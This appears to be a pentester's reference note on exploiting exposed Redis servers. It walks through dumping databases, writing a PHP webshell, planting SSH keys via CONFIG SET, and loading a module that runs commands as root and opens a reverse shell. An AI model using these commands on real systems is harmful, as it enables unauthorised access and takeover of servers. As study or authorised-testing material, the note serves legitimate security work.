# Port 6379 (REDIS) ### Dumping Database Inside Redis the **databases are numbers starting from 0**. You can find if anyone is used in the output of the command `info` inside the "Keyspace" chunk: ![](https://github.com/marcgoam/M4RCG04M-blog/blob/main/notes/explotation/imgs/Pasted%20image%2020250904133926.png) Or you can just get all the **keyspaces** (databases) with: ``` INFO keyspace ``` In that example the **database 0 and 1** are being used. **Database 0 contains 4 keys and database 1 contains 1**. By default Redis will use database 0. In order to dump for example database 1 you need to do: ``` SELECT 1 [ ... Indicate the database ... ] KEYS * [ ... Get Keys ... ] GET [ ... Get Key ... ] ``` In case you get the following error `-WRONGTYPE Operation against a key holding the wrong kind of value` while running `GET ` it's because the key may be something else than a string or an integer and requires a special operator to display it. To know the type of the key, use the `TYPE` command, example below for list and hash keys. ``` TYPE [ ... Type of the Key ... ] LRANGE 0 -1 [ ... Get list items ... ] HGET [ ... Get hash item ... ] # If the type used is weird you can always do: DUMP ` ``` **Dump the database with npm** [**redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/) ### Redis RCE #### Interactive Shell [**redis-rogue-server**](https://github.com/n0b0dyCN/redis-rogue-server) can automatically get an interactive shell or a reverse shell in Redis(<=5.0.5). ``` ./redis-rogue-server.py --rhost --lhost ``` #### PHP Webshell After you did the command info, you must know the **path** of the **Web site folder**: ``` root@kali:~# redis-cli -h 10.85.0.52 10.85.0.52:6379> config set dir /usr/share/nginx/html OK 10.85.0.52:6379> config set dbfilename redis.php OK 10.85.0.52:6379> set test "" OK 10.85.0.52:6379> save OK ``` #### SSH **Generate a ssh public-private key pair on your pc:** ``` ssh-keygen -t rsa ``` Write the public key to a file: ``` (echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt ``` **Import the file into redis:** ``` **`cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key ``` **Save the public key to the authorized\_keys file on redis server:** ``` root@kali:~# redis-cli -h 10.85.0.52 10.85.0.52:6379> config set dir /var/lib/redis/.ssh OK 10.85.0.52:6379> config set dbfilename "authorized_keys" OK 10.85.0.52:6379> save OK ``` \*\*Finally, you can ssh to the redis server with private key: ``` ssh -i id_rsa redis@10.85.0.52 ``` **This technique is automated here:** #### Load Redis Module Following the instructions from you can **compile a redis module to execute arbitrary commands**. Then you need some way to **upload the compiled** module (for example ftp) ![](https://github.com/marcgoam/M4RCG04M-blog/blob/main/notes/explotation/imgs/Pasted%20image%2020250904132504.png) **Load the uploaded module** at runtime ``` MODULE LOAD /path/to/mymodule.so ``` ![](https://github.com/marcgoam/M4RCG04M-blog/blob/main/notes/explotation/imgs/Pasted%20image%2020250904132452.png) **List loaded modules** to check it was correctly loaded: ``` MODULE LIST ``` Execute **commands**: ``` 127.0.0.1:6379> system.exec "id" "uid=0(root) gid=0(root) groups=0(root)" 127.0.0.1:6379> system.exec "whoami" "root" 127.0.0.1:6379> system.rev 127.0.0.1 9999 ``` **Unload the module whenever you want:** ``` MODULE UNLOAD mymodule ```